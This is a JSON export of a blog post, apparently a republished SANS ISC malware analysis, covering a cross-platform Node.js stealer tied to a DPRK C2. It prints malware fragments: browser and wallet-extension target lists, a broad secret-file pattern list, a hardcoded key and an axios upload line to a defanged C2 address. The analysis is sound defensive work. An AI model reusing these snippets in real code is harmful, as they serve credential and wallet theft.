{"id":3292,"date":"2026-05-22T07:02:56","date_gmt":"2026-05-22T07:02:56","guid":{"rendered":"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/22\/cross-platform-npm-stealer-fri-may-22nd\/"},"modified":"2026-05-22T07:02:56","modified_gmt":"2026-05-22T07:02:56","slug":"cross-platform-npm-stealer-fri-may-22nd","status":"publish","type":"post","link":"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/22\/cross-platform-npm-stealer-fri-may-22nd\/","title":{"rendered":"Cross-Platform NPM Stealer, (Fri, May 22nd)"},"content":{"rendered":"<div>\n<p>I found a Node.js stealer that looked pretty well obfuscated. The file was not running out-of-the-box because it was uploaded on VT as \u201cextracted-decoded.js\u201d (and reformatted). The SHA256 is 049300aa5dd774d6c984779a0570f59610399c71864b5d5c2605906db46ddeb9[<a href=\"https:\/\/www.virustotal.com\/gui\/file\/049300aa5dd774d6c984779a0570f59610399c71864b5d5c2605906db46ddeb9\">1<\/a>]. It did not run properly in a sandbox so only a static analysis was performed.<\/p>\n<p>The key point is that it is a cross-platform stealer targeting Windows (WSL), macOS and Linux. Good news for us: only the \u201cwrapper\u201d that is responsible for the execution is obfuscated, but the malicious payloads are embedded in plain text! The obfuscation technique looks typical of the code produced by obfuscator.io[<a href=\"https:\/\/obfuscator.io\/\">2<\/a>]. 
We are facing a very long array of small Base64-encoded strings:<\/p>\n<pre style=\"background: rgb(238, 238, 238); border: 1px solid rgb(204, 204, 204); padding: 5px 10px;\">\nfunction c() {\n  const t8 = [\"W54gaGuj\", \"pSkByhzh\", \"WRT\/WPThyG\", \"CSomW6OXWQG\", \"WO7dIuVcTaq\", \"AYb2Axm\", \"WPT3WPJdLmkS\", \"WPTNeuWa\", \n\u00a0 \"hCkIW64XW7C\", \"W47cM0tcObS\", \"WPKbWOKfW74\", \"W6JdNCkDWRe+\", \"W53dLuxcP3u\", \"WRTUc8ocW4W\", \"ysiSica\", \"wCo4oser\", \"tSkAW5v3ca\",\n\u00a0 \"W54XaKvz\", \"W7nTe8ooW7a\", \"W4BcSSo\/FLi\", \"W6HvW7i+FG\", \"W5iBabul\", \"F8oQW4JcVCku\", \"W5ldPCkKbcy\", \"W6ddQcdcNq0\", \"Aw5Niha\",\n  \"Dcy9W5dcVq\", \"C8o\/eqBcHW\", \"id0GBMu\", \"W5FcISkyW4FcJG\", \"WR1ieSotW4y\", \"wSoqq8o1da\", \"B3jKvMe\", \"icDmB2m\", \"uSkgW4qZiq\", \n\u00a0 \"WO7cMSkoW7zX\", \"W5HxW6OnW7S\", \"W4SBWRHwW7e\", \"zwa3W5dcOG\", \"W4PCW79DW6a\", \"omkrngXB\", \"xmkVCWeJ\", \"nCoEWQ1WWR0\", \"WRNcH3vwCG\", \n\u00a0 \"W7lcTSoUCq8\", \"rM9sWR\/cPW\", \"W4ZcKbxcUIC\", \"DgGGDg8\", \"WR7dK8kpWROP\", \"fmo7j1et\", \"id09psa\", \"vSo4Cx4n\", \"iIWImJq\", \"WRrixrpcJq\",\n\u00a0 \"u29JA2u\", \"ve9swsW\", \"WRBdHH3dUa0\", \"W5RcKLpdTuW\", \"u3ruyKK\", \"WOVcLSowW4RcPG\", \"BwuGzgK\", \"ugf0AdO\", \"W63cJ3Kmaa\", \"WPVdRCk1bti\", \n\u00a0 \"DwrVige\", \"C8k2WQxcTh0\", \"igvUDhi\", \"tmkSl1Ld\", \"qqvnW4pcMa\", \"WPNdGahdO0i\", \"nmkQWRNdPNa\", \"WQD8qmodW6G\", \"W4NdK8oBW5pdQq\", \n\u00a0 \"quFcOmoQWRe\", \"Cbyarmkq\", \"tmkoWQHU\", \"ewb8W4eF\", \"vcCOWOPc\", \"WRtdQc3dIrW\", \"WQXIrSoqW5q\", \"kcDqCM8\", \"imkUWQtcPxC\", \n\u00a0 \"bmooW7q6hW\", \n  ...\n<\/pre>\n<p>Other small functions are low-level decoders that perform a lot\u00a0of arithmetic operations. There are three main payloads that all have their own purpose:<\/p>\n<p>The first one is a browser credential stealer. 
It supports: Chrome, Brave, Edge, Opera, Opera GX, Vivaldi, Kiwi, Yandex, Iridium, Comodo Dragon, SRWare Iron, Chromium, AVG Browser.<\/p>\n<pre style=\"background: rgb(238, 238, 238); border: 1px solid rgb(204, 204, 204); padding: 5px 10px;\">\nconst localAppDataBase = `\/mnt\/c\/Users\/${windowsUsername}\/AppData\/Local`;\nconst browserRelativePaths = [\n\u00a0 \"Google\/Chrome\/User Data\",                    \/\/ Chrome\n\u00a0 \"BraveSoftware\/Brave-Browser\/User Data\",      \/\/ Brave\n\u00a0 \"AVG Browser\/User Data\",                      \/\/ AVG Browser\n\u00a0 \"Microsoft\/Edge\/User Data\",                   \/\/ Edge\n\u00a0 \"Opera Software\/Opera Stable\",                \/\/ Opera\n\u00a0 \"Opera Software\/Opera GX\",                    \/\/ Opera GX\n\u00a0 \"Vivaldi\/User Data\",                          \/\/ Vivaldi\n\u00a0 \"Kiwi Browser\/User Data\",                     \/\/ Kiwi\n\u00a0 \"Yandex\/YandexBrowser\/User Data\",             \/\/ Yandex\n\u00a0 \"Iridium\/User Data\",                          \/\/ Iridium\n\u00a0 \"Comodo\/Dragon\/User Data\",                    \/\/ Comodo\n\u00a0 \"SRWare Iron\/User Data\",                      \/\/ SRWare\n\u00a0 \"Chromium\/User Data\"                          \/\/ Chromiumn\n];<\/pre>\n<p>The malware also looks for interesting wallet Chrome extensions:<\/p>\n<pre style=\"background: rgb(238, 238, 238); border: 1px solid rgb(204, 204, 204); padding: 5px 10px;\">\nconst wps = [\n\u00a0 \"nkbihfbeogaeaoehlefnkodbefgpgknn\",\n  \"ejbalbakoplchlghecdalmeeeajnimhm\",\n  \"acmacodkjbdgmoleebolmdjonilkdbch\",\n  \"bfnaelmomeimhlpmgjnjophhpkkoljpa\", \n  \"ibnejdfjmmkpcnlpebklmnkoeoihofec\",\n  \"egjidjbpglichdcondbcbdnbeeppgdph\",\n  \"nphplpgoakhhjchkkhmiggakijnkhfnd\",\n  \"omaabbefbmiijedngplfjmnooppbclkk\",\n  \"bhhhlbepdkbapadjdnnojkbgioiodbic\",\n  \"aeachknmefphepccionboohckonoeemg\",\n  \"aflkmhkiijdbfcmhplgifokgdeclgpoi\",\n  \"agoakfejjabomempkjlepdflaleeobhb\",\n  
\"aholpfdialjgjfhomihkjbmgjidlcdno\",\n  \"afbcbjpbpfadlkmhmclhkeeodmamcflc\",\n  \"cgbogdmdefihhljhfeffkljbghamglni\",\n  \"dmkamcknogkgcdfhhbddcghachkejeap\",\n  \"dlcobpjiigpikoobohmabehhmhfoodbb\",\n  \"efbglgofoippbgcjepnhiblaibcnclgk\",\n  \"ejjladinnckdgjemekebdpeokbikhfci\",\n  \"fhbohimaelbohpjbbldcngcnapndodjp\",\n  \"fhkbkphfeanlhnlffkpologfoccekhic\",\n  \"fhmfendgdocmcbmfikdcogofphimnkno\",\n  \"fldfpgipfncgndfolcbkdeeknbbbnhcc\", \n  \"gjnckgkfmgmibbkoficdidcljeaaaheg\",\n  \"hifafgmccdpekplomjjkcfgodnhcellj\",\n  \"hmeobnfnfcmdkdcmlblgagmfpfboieaf\",\n  \"hnfanknocfeofbddgcijnmhnfnkdnaad\",\n  \"jiidiaalihmmhddjgbnbgdfflelocpak\",\n  \"jblndlipeogpafnldhgmapagcccfchpi\",\n  \"jmbkjchcobfffnmjboflnchcbljiljdk\",\n  \"jnjpmcgfcfeffkfgcnjefkbkgcpnkpab\", \n  \"kpkmkbkoifcfpapmleipncofdbjdpice\",\n  \"khpkpbbcccdmmclmpigdgddabeilkdpd\",\n  \"ldinpeekobnhjjdofggfgjlcehhmanaj\", \n  \"lgmpcpglpngdoalbgeoldeajfclnhafa\", \n  \"mcohilncbfahbmgdjkbpemcciiolgcge\",\n  \"mopnmbcafieddcagagdcbnhejhlodfdd\", \n  \"nkklfkfpelhghbidbnpdfhblphpfjmbo\", \n  \"penjlddjkjgpnkllboccdgccekpkcbin\", \n  \"ppbibelpcjmhbdihakflkdcoccbgbkpo\"\n]<\/pre>\n<p>Data is exfiltrated to port 8085.<\/p>\n<p>The second one is a recursive file exfiltration scanner. 
It scans the victim\u2019s filesystem and searches for sensitive files by name\/extension.<\/p>\n<pre style=\"background: rgb(238, 238, 238); border: 1px solid rgb(204, 204, 204); padding: 5px 10px;\">\nconst SENSITIVE_FILE_PATTERNS = [\n\u00a0 \".keystore\", \"phone\", \"database\",\"bank\", \"financ\",\".env\",\"env\",\"environment\",\"config\",\"configuration\",\"configure\",\".conf\",\n  \".cfg\",\".ini\",\".properties\",\".yaml\",\".yml\",\".toml\",\"metamask\",\"phantom\",\"bitcoin\",\"ethereum\",\"eth\",\"trust\",\n  \"wallet\",\"coinbase\",\"exodus\",\"ledger\",\"trezor\",\"keystore\",\"keyring\",\"keychain\",\"atomic\",\"electrum\",\"mycelium\",\n  \"blockchain\",\"bravewallet\",\"rabby\",\"coin98\",\"backpack\",\"core\",\"mathwallet\",\"solflare\",\"glow\",\"keplr\",\"argent\",\n  \"martian\",\"petra\",\"binance\",\"okx\",\"crypto\",\"cryptocurrency\",\"hardhat\",\"truffle\",\"private\",\"privatekey\", \"private_key\",\n\u00a0 \"private-key\",\"privkey\",\"priv_key\",\"key\",\"keypair\",\"key_pair\",\"keypair\",\".pem\",\".p12\",\".pfx\",\".jks\",\"keystore\",\".keys\",\n  \"keys\",\".p8\",\".p7b\",\".p7c\",\".cer\",\".crt\",\".cert\",\"cert\",\".der\",\"id_rsa\",\"id_dsa\",\"id_ecdsa\",\"id_ed25519\",\".pub\",\n  \".priv\",\"seed\",\"seedphrase\",\"seed_phrase\",\"seed-phrase\",\"mnemonic\",\"phrase\",\"passphrase\",\"pass_phrase\",\n  \"pass-phrase\",\"recovery\",\"recoveryphrase\",\"recovery_phrase\",\"recovery-phrase\",\"backup\",\"backupphrase\",\"backup_phrase\",\n  \"backup-phrase\",\"12words\",\"12_words\",\"12words\",\"24words\",\"24_words\",\"24words\",\"bip39\",\"bip44\",\"password\",\"passwd\",\"pass\",\"pwd\",\n  \"credential\",\"credentials\",\"auth\",\"authentication\",\"token\",\"access_token\",\"refresh_token\",\"api_key\",\"apikey\",\"api-key\",\n  \"apisecret\",\"api_secret\",\"api-secret\",\"secret\",\"secrets\",\"secretkey\",\"secret_key\",\"secret-key\",\"masterkey\",\"master_key\",\n  \"master-key\",\"masterpassword\",\"master_password\",\"master-password\",\"account\",\"accounts\",\"profile\",\"profiles\",\"user\",\n  \"username\",\"user_name\",\"user-name\",\"login\",\"signin\",\"sign_in\",\"sign-in\",\"address\",\"addresses\",\"tx\",\"transaction\",\"transactions\",\n  \".db\",\".sqlite\",\".sqlite3\",\".sql\",\".mdb\",\".accdb\",\".dbf\",\".doc\",\".docx\",\".pdf\",\".md\",\".markdown\",\".rtf\",\".odt\",\n  \".xls\",\".xlsx\",\".txt\",\"text\",\"note\",\"notes\",\"memo\",\"memos\",\"screenshot\",\"screen\",\"snapshot\",\"capture\",\".png\",\".jpg\",\n  \".jpeg\",\".bmp\",\".json\",\".js\",\".ts\",\".jsx\",\".tsx\",\".csv\",\".xml\",\".lock\",\".log\",\".bak\",\"backup\",\".old\",\".orig\",\".save\",\n  \".swp\",\".tmp\",\"tmp\",\"my\",\"personal\",\"vault\",\"safe\",\"secure\",\"lock\",\"encrypt\",\"decrypt\",\"signature\",\"sign\",\"certificate\",\n  \"cert\",\"identity\",\"session\",\"cookie\"\n];<\/pre>\n<p>Interesting files are exfiltrated via port 8086.<\/p>\n<p>Finally, the third module implements a WebSocket connection to the C2 server (port 8087) with reverse-shell capabilities. Upon the first connection, the following info is sent to the C2 via a POST request to hxxp:\/\/216[.]126[.]225[.]243:8087\/api\/notify:<\/p>\n<pre style=\"background: rgb(238, 238, 238); border: 1px solid rgb(204, 204, 204); padding: 5px 10px;\">\n{\n  \"ukey\": 504,\n  \"t\": 5,\n  \"host\": \"504_&lt;hostname&gt;\",\n  \"os\": \"&lt;type&gt; &lt;release&gt;\",\n  \"username\": \"&lt;username&gt;\",\n  \"timestamp\": &lt;unix_ts&gt;\n}<\/pre>\n<p>All communications (on different ports) are made with the IP address 216[.]126[.]225[.]243. This IP address is known as a DPRK OtterCookie C2[<a href=\"https:\/\/socket.dev\/blog\/north-korea-contagious-interview-npm-attacks\">3<\/a>]. 
Note that although the execution module is pretty well obfuscated, the key used to encrypt data is available in plain text:<\/p>\n<pre style=\"background: rgb(238, 238, 238); border: 1px solid rgb(204, 204, 204); padding: 5px 10px;\">\nconst X = crypto.createHmac(\"sha256\", \"SuperStr0ngSecret@)@^\").update(l).digest(\"hex\");<\/pre>\n<p>Also, all HTTP communications are performed via the Axios[<a href=\"https:\/\/github.com\/axios\/axios\">4<\/a>] NPM package:<\/p>\n<pre style=\"background: rgb(238, 238, 238); border: 1px solid rgb(204, 204, 204); padding: 5px 10px;\">\nconst response = await axios.post(`\" + \"hxxp:\/\/216[.]126[.]225[.]243:8086\/upload\" + \"`, form, { ...<\/pre>\n<p>[1] <a href=\"https:\/\/www.virustotal.com\/gui\/file\/049300aa5dd774d6c984779a0570f59610399c71864b5d5c2605906db46ddeb9\">https:\/\/www.virustotal.com\/gui\/file\/049300aa5dd774d6c984779a0570f59610399c71864b5d5c2605906db46ddeb9<\/a><br \/>\n[2] <a href=\"https:\/\/obfuscator.io\/\">https:\/\/obfuscator.io<\/a><br \/>\n[3] <a href=\"https:\/\/socket.dev\/blog\/north-korea-contagious-interview-npm-attacks\">https:\/\/socket.dev\/blog\/north-korea-contagious-interview-npm-attacks<\/a><br \/>\n[4] <a href=\"https:\/\/github.com\/axios\/axios\">https:\/\/github.com\/axios\/axios<\/a><\/p>\n<p>Xavier Mertens (@xme)<br \/>\nXameco<br \/>\nSenior ISC Handler &#8211; Freelance Cyber Security Consultant<br \/>\n<a href=\"https:\/\/keybase.io\/xme\/key.asc\">PGP Key<\/a><\/p>\n<p> (c) SANS Internet Storm Center. https:\/\/isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.<\/p><\/div>\n","protected":false},"excerpt":{"rendered":"<p>I found a Node.js stealer that looked pretty well obfuscated. The file was not running out-of-the-box because it was uploaded on VT as \u201cextracted-decoded.js\u201d (and reformatted). The SHA256 is 049300aa5dd774d6c984779a0570f59610399c71864b5d5c2605906db46ddeb9[1]. 
It did not run properly in a sandbox so only a static analysis was performed. The key point is that it is a cross-platform stealer [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"site-container-style":"default","site-container-layout":"default","site-sidebar-layout":"default","disable-article-header":"default","disable-site-header":"default","disable-site-footer":"default","disable-content-area-spacing":"default","footnotes":""},"categories":[90],"tags":[91],"class_list":["post-3292","post","type-post","status-publish","format-standard","hentry","category-cybersecurity","tag-cybersecurity"],
"yoast_head_json":{"title":"Cross-Platform NPM Stealer, (Fri, May 22nd) - Imperative Business Ventures Limited","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/22\/cross-platform-npm-stealer-fri-may-22nd\/","og_locale":"en_US","og_type":"article","og_title":"Cross-Platform NPM Stealer, (Fri, May 22nd) - Imperative Business Ventures Limited","og_description":"I found a Node.js stealer that looked pretty well obfuscated. The file was not running out-of-the-box because it was uploaded on VT as \u201cextracted-decoded.js\u201d (and reformated). The SHA256 is 049300aa5dd774d6c984779a0570f59610399c71864b5d5c2605906db46ddeb9[1]. It did not run properly in a sandbox so only a static analysis was performed. 
The key point is that it is a cross-platform stealer [&hellip;]","og_url":"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/22\/cross-platform-npm-stealer-fri-may-22nd\/","og_site_name":"Imperative Business Ventures Limited","article_published_time":"2026-05-22T07:02:56+00:00","author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Written by":"admin","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/22\/cross-platform-npm-stealer-fri-may-22nd\/#article","isPartOf":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/22\/cross-platform-npm-stealer-fri-may-22nd\/"},"author":{"name":"admin","@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02"},"headline":"Cross-Platform NPM Stealer, (Fri, May 22nd)","datePublished":"2026-05-22T07:02:56+00:00","mainEntityOfPage":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/22\/cross-platform-npm-stealer-fri-may-22nd\/"},"wordCount":372,"keywords":["Cybersecurity"],"articleSection":["Cybersecurity"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/22\/cross-platform-npm-stealer-fri-may-22nd\/","url":"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/22\/cross-platform-npm-stealer-fri-may-22nd\/","name":"Cross-Platform NPM Stealer, (Fri, May 22nd) - Imperative Business Ventures 
Limited","isPartOf":{"@id":"https:\/\/blog.ibvl.in\/#website"},"datePublished":"2026-05-22T07:02:56+00:00","author":{"@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02"},"breadcrumb":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/22\/cross-platform-npm-stealer-fri-may-22nd\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/blog.ibvl.in\/index.php\/2026\/05\/22\/cross-platform-npm-stealer-fri-may-22nd\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/22\/cross-platform-npm-stealer-fri-may-22nd\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/blog.ibvl.in\/"},{"@type":"ListItem","position":2,"name":"Cross-Platform NPM Stealer, (Fri, May 22nd)"}]},{"@type":"WebSite","@id":"https:\/\/blog.ibvl.in\/#website","url":"https:\/\/blog.ibvl.in\/","name":"Imperative Business Ventures Limited","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/blog.ibvl.in\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02","name":"admin","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g","caption":"admin"},"sameAs":["https:\/\/blog.ibvl.in"],"url":"https:\/\/blog.ibvl.in\/index.php\/author\/admin_hcbs9yw6\/"}]}},"_links":{"self":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/posts\/3292","targetHints":{"allow":["GET"]}}],"collection"
:[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/comments?post=3292"}],"version-history":[{"count":0,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/posts\/3292\/revisions"}],"wp:attachment":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/media?parent=3292"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/categories?post=3292"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/tags?post=3292"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}